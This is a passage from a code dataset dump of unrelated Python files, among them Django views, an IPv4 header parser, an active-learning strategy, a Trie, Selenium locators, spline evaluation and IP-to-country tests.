name=request.POST.get('department'))\n event.added_by = request.user.username\n event.save()\n return HttpResponseRedirect(reverse('events:index'))\n else:\n form = EventForm() \n return render(request, 'events/add_event.html', {'form': form, \n 'departments_list':departments_list}) \n\n\ndef user_events(request, username=None):\n if not username:\n username = request.user.username\n departments_list = Department.objects.order_by('name')\n events_list = Event.objects.filter(\n added_by=username).order_by('-event_date')\n context = {'events_list':events_list, \n 'departments_list': departments_list, 'username':username}\n return render(request, 'events/index.html', context)","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"398435930","text":"# -*- coding: utf-8 -*-\nimport xlrd\nimport json\n\nhistorical_data = {}\n\nfile_path = './registry_map.xlsx'\nworkbook = xlrd.open_workbook(file_path)\nsheet = workbook.sheet_by_index(0)\nnrows = sheet.nrows\nprint('NUM ROWS', nrows)\n\ndef xls_to_json(startrow, circ):\n\t#print(\"START ROW\",startrow)\n\tdata =[]\n\tfor row in range(startrow, nrows):\n\t\tcell_0 = sheet.cell(row, 0).value\n\t\tcell_1 = sheet.cell(row, 1).value\n\t\tcell_2 = sheet.cell(row, 2).value\n\t\tcell_3 = sheet.cell(row, 3).value\n\t\tcell_4 = sheet.cell(row, 4).value\n\t\tif not cell_0:\n\t\t\tbreak\n\t\tdata.append({\"no\": cell_0,\n\t\t\t\t\t\t\t\t \"reg_area\":cell_1,\n\t\t\t\t\t\t\t\t \"polling_station\":cell_2,\n\t\t\t\t\t\t\t\t \"electors\":cell_3,\n\t\t\t\t\t\t\t\t \"map_url\":cell_4,\n\n\t\t\t\t\t\t\t\t })\n\n\thistorical_data[circ] = data\n\n\t\n\ndef xls_grouping(sheet):\n\tprint('start')\n\t\n\n\tfor row in range(0,nrows):\n\t\tcell_0 = sheet.cell(row, 0).value\n\t\tif 'circonscription' in str(cell_0).lower():\n\t\t\t#print(cell_0)\n\t\t\tcirc = cell_0.split()[1]\n\t\t\txls_to_json( row + 1, circ)\n\n\n\n\n\n\n\n\n\n\nxls_grouping(sheet)\njson_data = json.dumps(historical_data)\nwith open('./registry.json','w') as f:\n\tjson.dump(historical_data, f)\nprint(\"HISTORICAL DATA JSON\", json_data)\n","sub_path":"elections_reg.py","file_name":"elections_reg.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"499737054","text":"import numpy as np\nimport time\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom .strategy import Strategy\nfrom model import ResNet18, init_params\n\n\nclass RandomNetworkDistillation(Strategy):\n def __init__(self, X, Y, idxs_lb, net, handler, args, experiment):\n super(RandomNetworkDistillation, self).__init__(X,\n Y,\n idxs_lb,\n net,\n handler,\n args,\n experiment)\n self.predictor_net = ResNet18(in_channels=3).to(self.device)\n self.predictor_state = self.predictor_net.state_dict()\n\n def query(self, n):\n # Freeze classifier weights\n for param in self.clf.parameters():\n param.requires_grad = False\n\n # Train predictor on labeled data with target outputs as labels\n self.predictor_net.apply(init_params)\n print(\"Starting Predictor Training on labeled data.\")\n self.train_predictor()\n print(\"Finished training Predictor on labeled data.\")\n\n # Run predictor on unlabeled data with target outputs as labels\n idxs_unlabeled = np.arange(self.n_pool)[~self.idxs_lb]\n # Split the unlabeled 85% train/ 20% holdout test randomly\n k = int(float(len(idxs_unlabeled)) * .85)\n idxs_tmp = np.arange(len(idxs_unlabeled))\n np.random.shuffle(idxs_tmp)\n idxs_rnd_train = idxs_unlabeled[idxs_tmp[:k]]\n idxs_rnd_test = idxs_unlabeled[idxs_tmp[k:]]\n\n scores = self.score_data(self.X[idxs_rnd_train],\n self.X[idxs_rnd_test])\n # Lower scores have lower loss so that sample was more representative\n print(\"Started querying.\")\n scores_sorted, idxs = scores.sort(descending=False)\n\n # Unfreeze classifier weights\n for param in self.clf.parameters():\n param.requires_grad = True\n\n # Return the n unlabeled samples which received highest uncertainty\n return idxs_rnd_train[idxs[:n]]\n\n def score_data(self, X_train, X_test):\n \"\"\"Returns uncertainty scores on giving data.\n \"\"\"\n # Save the predictor's state\n self.predictor_state = self.predictor_net.state_dict()\n\n # Define optimizer and init scores array (output)\n optimizer = optim.SGD(self.predictor_net.parameters(),\n **self.args['distill_optimizer_args'])\n scores = torch.zeros(len(X_train))\n loader_tr = DataLoader(\n self.handler(X_train, np.zeros(len(X_train)),\n transform=self.args['transform']),\n shuffle=True, batch_size=1, drop_last=False)\n loader_te = DataLoader(\n self.handler(X_test, np.zeros(len(X_test)),\n transform=self.args['transform']),\n shuffle=True, batch_size=5000, drop_last=False)\n # Iterate over train data\n for count, (x, _, idx) in enumerate(loader_tr):\n start = time.time()\n # Restore predictor original state\n self.predictor_net.load_state_dict(self.predictor_state)\n # Perform two SGD passes on current data point\n optimizer.zero_grad()\n for _ in range(2):\n x = x.to(self.device)\n _, target_embedding = self.clf(x)\n _, predicted_embedding = self.predictor_net(x)\n loss = F.mse_loss(predicted_embedding, target_embedding)\n loss.backward()\n optimizer.step()\n\n self.predictor_net.eval()\n avg_loss = 0\n # Evaluate loss on \"test data\"\n with torch.no_grad():\n for t, _, _ in loader_te:\n t = t.to(self.device)\n _, target_embedding = self.clf(t)\n _, predicted_embedding = self.predictor_net(t)\n avg_loss += F.mse_loss(predicted_embedding,\n target_embedding).cpu()\n avg_loss /= len(X_test)\n\n scores[idx] = avg_loss # Lower scores are better\n end = time.time()\n print(f\"Scored element {count+1}/{len(loader_tr)} \"\n f\"in {end-start:.2f} seconds.\")\n return scores\n\n def train_predictor(self):\n # Train predictor network on already labeled data\n # First round trains for n_epochs, afterwards trains for less epochs\n n_epoch = self.args['n_epoch']\n\n idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n optimizer = optim.SGD(self.predictor_net.parameters(),\n **self.args['distill_optimizer_args'])\n loader_tr = DataLoader(\n self.handler(self.X[idxs_train], self.Y[idxs_train],\n transform=self.args['transform']),\n shuffle=True, **self.args['loader_tr_args']\n )\n\n for epoch in range(1, n_epoch + 1):\n optimizer.zero_grad()\n self._train_predictor(epoch, loader_tr, optimizer)\n\n def _train_predictor(self, epoch, loader_tr, optimizer):\n self.predictor_net.train()\n for batch_idx, (x, _, idxs) in enumerate(loader_tr):\n x = x.to(self.device)\n optimizer.zero_grad()\n _, target_embedding= self.clf(x)\n _, predicted_embedding = self.predictor_net(x)\n loss = F.mse_loss(predicted_embedding, target_embedding)\n loss.backward()\n optimizer.step()\n","sub_path":"query_strategies/random_network_distillation.py","file_name":"random_network_distillation.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"188920935","text":"# 【代码题】\n# 编写函数,计算 0 ~ 100 之间所有数字的累计求和结果,打印到终端里。\n\n\ndef sum_num():\n tamp = 0\n for i in range(0, 101):\n tamp += i\n print(tamp)\n\n\ndef sum_num1():\n count = 0\n tamp = 0\n while count <= 100:\n tamp += count\n count += 1\n print(tamp)\n\n\nif __name__ == '__main__':\n sum_num()\n sum_num1()\n","sub_path":"9月-Python核心编程/python核心编程阶段-python基础/03-function函数/9-14 课后练习函数基础.py","file_name":"9-14 课后练习函数基础.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367028616","text":"from django.urls import path\nfrom ..views import (\n DayOffListView,\n DayOffCreateView,\n DayOffDeleteView\n)\n\nurlpatterns = [\n path('day-off/', DayOffListView.as_view(), name='days-off'),\n path('day-off/create', DayOffCreateView.as_view(), name='day-off-create'),\n path('day-off//create', DayOffCreateView.as_view(), name='day-off-create'),\n path('day-off//delete', DayOffDeleteView.as_view(), name='day-off-delete'),\n]\n","sub_path":"employees/urls/day_off.py","file_name":"day_off.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"545911064","text":"import os.path, shutil\r\n# from Handbook.readTextFile import readTextFile\r\n\r\ndef readTextFile(filename):\r\n retList = []\r\n infile = open(filename)\r\n for file in infile:\r\n file = file.rstrip()\r\n retList.append(file)\r\n return retList\r\n\r\ndef moveFiles2Dir(fileList, dirname):\r\n srcDir = 'H:/xStuffs/Videos/TubeA'\r\n ''' Move file specified from the filelist to directory dirname '''\r\n for file in fileList:\r\n filename, filedir = file.split('.mp4, ') \r\n srcFilename = os.path.join(srcDir, filedir, filename + '.mp4') \r\n dstFilename = os.path.join(srcDir, dirname, filename + '.mp4')\r\n if os.path.isfile(srcFilename):\r\n print(\"Moving '{}' to destination directory...\".format(srcFilename))\r\n shutil.move(srcFilename, dstFilename)\r\n else:\r\n print(\"*** Info: File '{}' is not found.\".format(srcFilename))\r\n \r\ndef moveFile2Dir(file, dirname):\r\n srcDir = 'H:/xStuffs/Videos/TubeA'\r\n filename, filedir = file.split('.mp4, ') \r\n srcFilename = os.path.join(srcDir, filedir, filename + '.mp4') \r\n dstFilename = os.path.join(srcDir, dirname, filename + '.mp4')\r\n if os.path.isfile(srcFilename):\r\n print(\"Moving '{}' to destination directory...\".format(srcFilename))\r\n shutil.move(srcFilename, dstFilename)\r\n else:\r\n print(\"*** Info: File '{}' is not found.\".format(srcFilename))\r\n\r\ndef main():\r\n# dirname = 'H:/xStuffs/Videos/TubeA/Misc/Single'\r\n dirname = 'G:/Learning Center/Selenium/Automated Web Testing with Selenium with John Sonmez (PluralSight)'\r\n dstname = 'H:/xStuffs/Videos/TubeA/Misc/Singles'\r\n if os.path.isdir(dirname):\r\n for folder, subfolders, files in os.walk(dirname):\r\n print(folder)\r\n if len(subfolders) == 0 and len(files) < 6:\r\n print(\"This is a leaf directory which contains less then 6 files\")\r\n for file in files:\r\n srcfile = os.path.join(folder, file)\r\n dstfile = os.path.join(dstname, file)\r\n print(\"Moving '{}' to destination directory...\".format(file))\r\n# shutil.move(srcfile, dstfile)\r\n print(\"Removing directory '{}'...\".format(folder))\r\n# os.rmdir(dirname)\r\n else:\r\n print(\"*** Warning: Directory '{}' does not exist. Aborting...\".format(dirname))\r\nif __name__ == '__main__':main()","sub_path":"PythonEssentials/FolderSync/utility/moveFiles.py","file_name":"moveFiles.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"2719484","text":"import utility as U\nfrom icmp import ICMPHeader\nfrom tcp import TCPHeader\nfrom udp import UDPHeader\n\nclass IPv4Header :\n __protocolTbl = {1: 'icmp', 2: 'igmp', 6: 'tcp', 17: 'udp', 41: 'encap', 89: 'ospf', 132: 'sctp'}\n __nextHeaderTbl = {1: ICMPHeader, 6: TCPHeader, 17: UDPHeader}\n\n def __init__ (self, packetDump) :\n self.header = dict()\n self.header['version'] = 0xf & (packetDump[0] >> 4)\n if (self.header['version'] == 4) : \n self.header['ihl'] = 0xf0 & packetDump[0]\n self.header['dscp'] = 0x3f & (packetDump[1] >> 2)\n self.header['ecn'] = 0x3 & packetDump[1]\n self.header['length'] = U.ListToNum(packetDump[2:4])\n self.header['id'] = U.ListToNum(packetDump[4:6])\n self.header['flags'] = 0x7 & (packetDump[6] >> 5)\n self.header['frag-off'] = U.ListToNum(packetDump[6:8])\n self.header['frag-off'] = 0x1fff & self.header['frag-off']\n self.header['ttl'] = packetDump[8]\n self.header['proto'] = packetDump[9]\n self.header['chk-sum'] = U.ListToNum(packetDump[10:12])\n self.header['srcip'] = IPAddress(packetDump[12:16])\n self.header['dstip'] = IPAddress(packetDump[16:20])\n del packetDump[:20]\n else :\n self.header = None\n\n def __str__ (self) :\n s = \"Internet Protocol v4:\"\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {:s}\").format(\"Destination IP:\", self.header['dstip'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {:s}\").format(\"Source IP:\", self.header['srcip'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"DSCP:\", self.header['dscp'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"ECN:\", self.header['ecn'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Total Length:\", self.header['length'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Identification:\", self.header['id'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Flags:\", self.header['flags'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Fragment Offset:\", self.header['flags'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"TTL:\", self.header['ttl'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {} ({})\").format(\"Protocol:\", self.header['proto'], self.__protocolStr())\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} 0x{:04X}\").format(\"Header Checksum:\", self.header['chk-sum'])\n return s\n\n def __eq__ (self, val) :\n return True if (val is None and self.header is None) else False\n\n def __ne__ (self, val) :\n return False if (val is None and self.header is None) else True\n\n def __protocolStr(self) :\n return self.__protocolTbl[self.header['proto']].upper() if (self.header['proto'] in self.__protocolTbl) else \"Unknown\"\n\n def nextHeader(self, packetDump) :\n return self.__nextHeaderTbl[self.header['proto']](packetDump)\n \n\n\nclass IPAddress :\n def __init__ (self, ip) :\n self.ip = [0]*4\n self.update(ip)\n \n def __str__ (self) :\n s = \"{:d}\".format(self.ip[0])\n for i in range(1, 4) :\n s += \".{:d}\".format(self.ip[i])\n return s\n\n def update(self, ip) :\n self.ip = ip\n","sub_path":"ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"93960721","text":"class Solution:\n def setZeroes(self, matrix):\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n first_col = False\n first_row = False\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][j] == 0:\n matrix[i][0] = 0\n matrix[0][j] = 0\n for i in range(0, m):\n if matrix[i][0] == 0:\n for j in range(1, n):\n matrix[i][j] = 0\n for j in range(0, n):\n if matrix[0][j] == 0:\n for i in range(1, m):\n matrix[i][j] = 0\n\n","sub_path":"73/73.set-matrix-zeroes.661620413.Wrong-Answer.leetcode.python3.py","file_name":"73.set-matrix-zeroes.661620413.Wrong-Answer.leetcode.python3.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"375721905","text":"\"\"\"\nYou are given two positive integers n and k.\nPrint the k-th positive integer that is not divisible by n.\n\nFor example, if n=3, and k=7, then all numbers\nthat are not divisible by 3 are: 1,2,4,5,7,8,10,11,13….\nThe 7-th number among them is 10.\n\"\"\"\n\ndef solve_eff(num, k):\n diff = (k-1) // (num-1)\n return k + diff\n\n\ndef solve(num, k):\n res, cnt = 0, 0\n s = 1\n while cnt != k:\n if s % num != 0:\n cnt += 1\n s += 1\n return s - 1\n\n\nif __name__ == '__main__':\n t = int(input())\n while t > 0:\n nk = input().split()\n number, kth = int(nk[0]), int(nk[1])\n output = solve_eff(number, kth)\n print(output)\n t -= 1\n","sub_path":"contests/1352/1352C-Kth-not-divisible-by-N.py","file_name":"1352C-Kth-not-divisible-by-N.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"643434665","text":"import os\n\nfrom ontology import Ontology\n\nfrom ontology import Ontology\n\nclass GeoOntology(Ontology):\n\n def read_grammars(self, grammar_file):\n grammars = {}\n grammars['cat'] = {}\n grammars['rel'] = {}\n with open(grammar_file) as f:\n for line in f:\n if line.startswith('schema:'):\n line = line[7:].strip()\n parts = line.split('\\t')\n if len(parts) == 2:\n cat = parts[0][4:]\n type0 = parts[1][5:]\n if cat not in grammars['cat']:\n grammars['cat'][cat] = []\n if type0 not in grammars['cat'][cat]:\n grammars['cat'][cat].append(type0)\n elif len(parts) == 3:\n rel = parts[1][4:]\n type1 = parts[0][5:]\n type2 = parts[2][5:]\n if rel not in grammars['rel']:\n grammars['rel'][rel] = []\n if (type1, type2) not in grammars['rel'][rel]:\n grammars['rel'][rel].append((type1, type2))\n return grammars\n\n def is_legal_action_then_read(self, pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, for_controller=True):\n\n return True,\n\n def is_legal_action(self, pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, for_controller=True, entity_lex_map={}):\n if for_controller and not self.use_ontology:\n return True\n if action_token == None or action_token == '' or action_token == '':\n return False\n if action_token.startswith('add_unk'):\n return False\n\n print('entity_lex in is_legal_action = %s' % entity_lex_map)\n if action_token.startswith('add_entity_node'):\n entity = action_token[action_token.index(':-:')+3:]\n #print('entity = %s' % entity)\n if entity not in entity_lex_map:\n entity_flag = False\n for entity_key in entity_lex_map:\n entity_value = entity_lex_map[entity_key]\n if entity == entity_value:\n entity_flag = True\n break\n if not entity_flag:\n return False\n\n\n if pre_action_class == 'inner_start':\n type_for_node_map = {}\n\n for node in node_dict:\n type_for_node_map[node] = []\n\n for type_edge in type_node_dict:\n if ':_:' not in type_edge:\n continue\n if not type_edge.startswith('TYPE_'):\n return False\n type_value = type_edge[5:type_edge.index(':_:')]\n if 'arg' not in type_node_dict[type_edge]:\n return False\n arg = type_node_dict[type_edge]['arg'][0]\n if arg not in type_for_node_map:\n return False\n if type_value in type_for_node_map[arg]:\n continue\n if type_value == 'elevation' or type_value == 'len' or \\\n type_value == 'population' or type_value == 'area':\n continue\n type_for_node_map[arg].append(type_value)\n\n for entity in entity_node_dict:\n if not ':=:' in entity:\n continue\n entity_type = entity[entity.index(':=:')+3:]\n if 'arg1' not in entity_node_dict[entity]:\n return False\n arg = entity_node_dict[entity]['arg1']\n if arg not in type_for_node_map:\n return False\n if entity_type not in type_for_node_map[arg]:\n type_for_node_map[arg].append(entity_type)\n\n #print('type_for_node_map: ', type_for_node_map)\n\n for node in type_for_node_map:\n type_size = len(type_for_node_map[node])\n if type_size < 2:\n continue\n for ii in range(type_size-1):\n for jj in range(ii+1, type_size):\n type1 = type_for_node_map[node][ii]\n type2 = type_for_node_map[node][jj]\n #print('type1: ', type1)\n #print('type2: ', type2)\n if type1 in self.grammars['cat'] and type2 in self.grammars['cat']:\n conjoin = set(self.grammars['cat'][type1]) & set(self.grammars['cat'][type2])\n if len(conjoin) == 0:\n return False\n elif type1 in self.grammars['cat']:\n if type2 not in self.grammars['cat'][type1]:\n return False\n elif type2 in self.grammars['cat']:\n if type1 not in self.grammars['cat'][type2]:\n return False\n else:\n return False\n\n for edge in edge_dict:\n if ':_:' not in edge:\n continue\n if 'arg1' not in edge_dict[edge]:\n return False\n if 'arg2' not in edge_dict[edge]:\n return False\n arg1 = edge_dict[edge]['arg1'][0]\n arg2 = edge_dict[edge]['arg2'][0]\n\n if arg1 not in type_for_node_map:\n return False\n if arg2 not in type_for_node_map:\n return False\n\n basic_type_1 = self.get_basic_type_for_node(type_for_node_map, arg1)\n basic_type_2 = self.get_basic_type_for_node(type_for_node_map, arg2)\n edge = edge[1:edge.index(':_:')]\n\n #print('edge: ', edge)\n #print('basic_type_1: ', basic_type_1)\n #print('basic_type_2: ', basic_type_2)\n\n if basic_type_1 == '' or basic_type_2 == '':\n continue\n if edge not in self.grammars['rel']:\n return False\n if (basic_type_1, basic_type_2) not in self.grammars['rel'][edge]:\n return False\n return True\n\n def get_basic_type_for_node(self, type_for_node_map, node):\n if node not in type_for_node_map or len(type_for_node_map[node])==0:\n return ''\n for type_value in type_for_node_map[node]:\n if type_value not in self.grammars['cat']:\n return type_value\n elif len(self.grammars['cat'][type_value]) == 1:\n return self.grammars['cat'][type_value][0]\n elif len(type_for_node_map[node]) > 1:\n continue\n elif len(self.grammars['cat'][type_value]) > 1:\n return ''\n else:\n return type_value\n return ''\n\n def get_legal_action_list(self, pre_action_class, pre_arg_list, pre_action, node_dict, type_node_dict, entity_node_dict,\n operation_dict, edge_dict, return_node, db_triple, fun_trace_list, action_all, for_controller=True, entity_lex_map={}):\n legal_action_list = []\n for action_token in action_all:\n legal_flag = self.is_legal_action(pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, entity_lex_map=entity_lex_map)\n if legal_flag:\n legal_action_list.append(True)\n else:\n legal_action_list.append(False)\n return legal_action_list","sub_path":"seq2action_replace/src/py/geoontology.py","file_name":"geoontology.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"274380704","text":"from selenium.webdriver.common.by import By\n\nclass ProductPageLocators():\n page_link = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n ADD_BUTTON_XPATH = (By.XPATH, \"//button[@class = 'btn btn-lg btn-primary btn-add-to-basket']\")\n ADD_MESSAGE_PRODUCT_XPATH = (By.XPATH, \"//div[@class = 'alertinner ']/strong\")\n ADD_MESSAGE_TEXT_XPATH = (By.XPATH, \"//div[@class = 'alertinner ']\")\n ADD_MESSAGE_PRICE_XPATH = (By. XPATH, \"//div[contains(@class, 'alert-info')]/div[@class='alertinner ']//strong\")\n SUCCESS_MESSAGE = (By.XPATH, \"//div[contains(@class, 'alert-success')]\")\n PRODUCT_NAME_XPATH = (By.XPATH, \"//div[@class = 'col-sm-6 product_main']/h1\")\n PRODUCT_PRICE_XPATH = (By.XPATH, \"//div[@class = 'col-sm-6 product_main']/p[@class = 'price_color']\")","sub_path":"Pages/locators.py","file_name":"locators.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"128792482","text":"from __future__ import absolute_import\n\nfrom sentry.models import Team\nfrom sentry.testutils import TestCase\n\n\nclass UserTest(TestCase):\n def test_merge_to(self):\n from_user = self.create_user('foo@example.com')\n from_team = self.create_team(name='foobar', owner=from_user)\n\n to_user = self.create_user('bar@example.com')\n to_team = self.create_team(name='foobaz', owner=to_user)\n\n from_user.merge_to(to_user)\n\n assert Team.objects.filter(owner=from_user).count() == 0\n assert Team.objects.filter(owner=to_user).count() == 2\n","sub_path":"tests/sentry/models/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"489445469","text":"import sys\r\n\r\n\r\n#\r\n## Trie\r\n#\r\n\r\nclass Node:\r\n def __init__(self):\r\n self.children = {}\r\n self.value = None\r\n\r\n\r\ndef find(node, key):\r\n for char in key:\r\n if( char in node.children ):\r\n node = node.children[char]\r\n\r\n else:\r\n return None\r\n return node.value\r\n\r\n\r\ndef insert(root, string, value):\r\n node = root\r\n last_index_char = None\r\n \r\n for char_index, char in enumerate(string):\r\n if( char in node.children ):\r\n node = node.children[char]\r\n else:\r\n last_index_char = char_index\r\n break\r\n\r\n # If there are any nodes to add, append them\r\n if( last_index_char != None ):\r\n for char in string[last_index_char:]:\r\n node.children[char] = Node()\r\n node = node.children[char]\r\n\r\n # Store the value in the terminal node\r\n node.value = value\r\n\r\n#\r\n##.\r\n#\r\n\r\ntrie_root = Node()\r\n\r\n\r\n\r\n# Inserting strings from collection to the Trie\r\nstring = input()\r\nvalue = 0\r\n\r\nwhile( string != \"KONIEC KOLEKCJI\" ):\r\n insert(trie_root, string, value)\r\n string = input()\r\n value += 1\r\n\r\n# Checking if given strings are in the Trie\r\n\r\nfor line in sys.stdin:\r\n string = line.rstrip(\"\\n\")\r\n if( find(trie_root, string) != None ):\r\n print(\"TAK\")\r\n else:\r\n print(\"NIE\")\r\n","sub_path":"Trie_Dict.py","file_name":"Trie_Dict.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"541146938","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport os\nimport imageio\nimport numpy.random as npr\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nimport seaborn as sns\nfrom collections import Counter\nimport scipy\nimport matplotlib.pyplot as plt\n\nnpr.seed(3456456)\n\nfilepath = os.getcwd() + \"\\\\IntroDS\\\\week3\\\\HASYv2\\\\\"\n\nhasy_full = pd.read_csv(filepath+'hasy-data-labels.csv')\nhasy = hasy_full.query('70<=symbol_id<=80')\n\n#print(hasy.head(10))\n\npics = []\n\nfor pic in hasy.path:\n #print(pic.replace('/','\\\\'))\n pics.append(imageio.imread(filepath+pic.replace('/', '\\\\')))\n\nlabels = hasy.symbol_id\n\npics = np.asarray(pics)\npics2 = pics[:,:,:,0].reshape(len(pics), 32*32)\nlabels = np.asarray(labels)\n#print(labels)\n\npics2_train, pics2_test, labels_train, labels_test = train_test_split(pics2, labels, test_size=0.2, random_state=0)\nprint(pics2_train.shape)\nprint(labels_train.shape)\n\nlogreg = LogisticRegression()\nlogreg.fit(pics2_train, labels_train)\n\ny_pred = logreg.predict(pics2_test)\n\nprint('Accuracy of logistic regression classifier on test set: {:.2f}'.format(logreg.score(pics2_test, labels_test)))\n\ndef most_common(lst):\n data = Counter(lst)\n return max(lst, key=data.get)\n\nnaive = labels_train\n\nright = 0\nfor i in labels_test:\n val = most_common(naive)\n ind = np.where(naive == val)\n #print(ind[0][0])\n naive = np.delete(naive, ind[0][0], axis=0)\n if i == val:\n right += 1\n\nprint('Accuracy of naive guesses on the test set: ', right/len(labels_test))\n\nconfutse = metrics.confusion_matrix(labels_test, y_pred)\nprint(confutse)\n\n\"\"\" m = confutse.shape[0]\nstrided = np.lib.stride_tricks.as_strided\ns0,s1 = confutse.strides\nout = strided(confutse.ravel()[1:], shape=(m-1,m), strides=(s0+s1,s1)).reshape(m,-1)\nprint(out) \"\"\"\n\nindex = 0\nmisclassifiedIndexes = []\nfor label, predict in zip(labels_test, y_pred):\n if label != predict:\n #print(label, predict)\n misclassifiedIndexes.append(index)\n index +=1\n\nprint(misclassifiedIndexes)\n\nplt.figure(figsize=(20,4))\nfor plotIndex, badIndex in enumerate(misclassifiedIndexes[0:5]):\n plt.subplot(1, 5, plotIndex + 1)\n plt.imshow(np.reshape(pics2_test[badIndex], (32,32)), cmap=plt.cm.gray)\n plt.title('Predicted: {}, Actual: {}'.format(y_pred[badIndex], labels_test[badIndex]), fontsize = 15)\n plt.show()","sub_path":"IntroDS/week3/week32.py","file_name":"week32.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"501569174","text":"# Author:\n# Loic Gouarin \n#\n# License: BSD 3 clause\n\"\"\"\nIntegration of a cubic spline.\n\"\"\"\nfrom __future__ import print_function, division, absolute_import\nimport numpy as np\n\ndef splint(xs, ys, y2s, x, y):\n \"\"\"\n Evaluate a sample on a cubic pline.\n\n Parameters\n ----------\n xs\n The x coordinates of the cubic spline.\n ys\n The y coordinates of the cubic spline.\n y2s\n The second derivative of the cubic spline.\n x\n The sample where to evaluation the cubic spline.\n y\n The y coordinates of the sample.\n\n See also\n --------\n splinart.spline.spline\n\n \"\"\"\n khi = np.searchsorted(xs, x)\n klo = khi-1\n step = xs[khi] - xs[klo]\n x_right = ((xs[khi]-x)/step)\n x_left = ((x-xs[klo])/step)\n\n if y.ndim == 2:\n step = step[:, np.newaxis]\n x_right = x_right[:, np.newaxis]\n x_left = x_left[:, np.newaxis]\n\n y[:] = x_right*ys[klo]+x_left*ys[khi]+(\n (x_right**3-x_right)*y2s[klo]+\n (x_left**3-x_left)*y2s[khi])*step**2/6\n","sub_path":"splinart/spline/splint.py","file_name":"splint.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"450371441","text":"import unittest\r\nimport iptocc\r\nimport ipaddress\r\n\r\nclass TestSearchDatabase(unittest.TestCase):\r\n def test_get_country_code(self):\r\n # Test valid US ipv4\r\n ipv4String = \"5.35.192.0\"\r\n country_code = iptocc.get_country_code(ipv4String)\r\n self.assertEqual(country_code, \"US\")\r\n\r\n # Test valid SE ipv4\r\n ipv4String = \"5.35.184.0\"\r\n country_code = iptocc.get_country_code(ipv4String)\r\n self.assertEqual(country_code, \"SE\")\r\n\r\n # Test valid US ipv6\r\n ipv6String = \"2a00:5440:0000:0000:0000:ff00:0042:8329\"\r\n country_code = iptocc.get_country_code(ipv6String)\r\n self.assertEqual(country_code, \"US\")\r\n\r\n # Test valid GB ipv6\r\n ipv6String = \"2a00:95e0:0000:0000:0000:ff00:0042:8329\"\r\n country_code = iptocc.get_country_code(ipv6String)\r\n self.assertEqual(country_code, \"GB\")\r\n\r\n # Testing an invalid IP\r\n with self.assertRaises(ValueError):\r\n invalidString = \"123456\"\r\n country_code = iptocc.get_country_code(invalidString)\r\n\r\n def test_convert_ip_string(self):\r\n # Test ipv6\r\n ipv6String = \"2001:0db8:0000:0000:0000:ff00:0042:8329\"\r\n ipv6Object = iptocc.convert_ip_string(ipv6String)\r\n self.assertEqual(isinstance(ipv6Object, ipaddress.IPv6Address), True)\r\n\r\n # Test ipv4\r\n ipv4String = \"127.0.0.1\"\r\n ipv4Object = 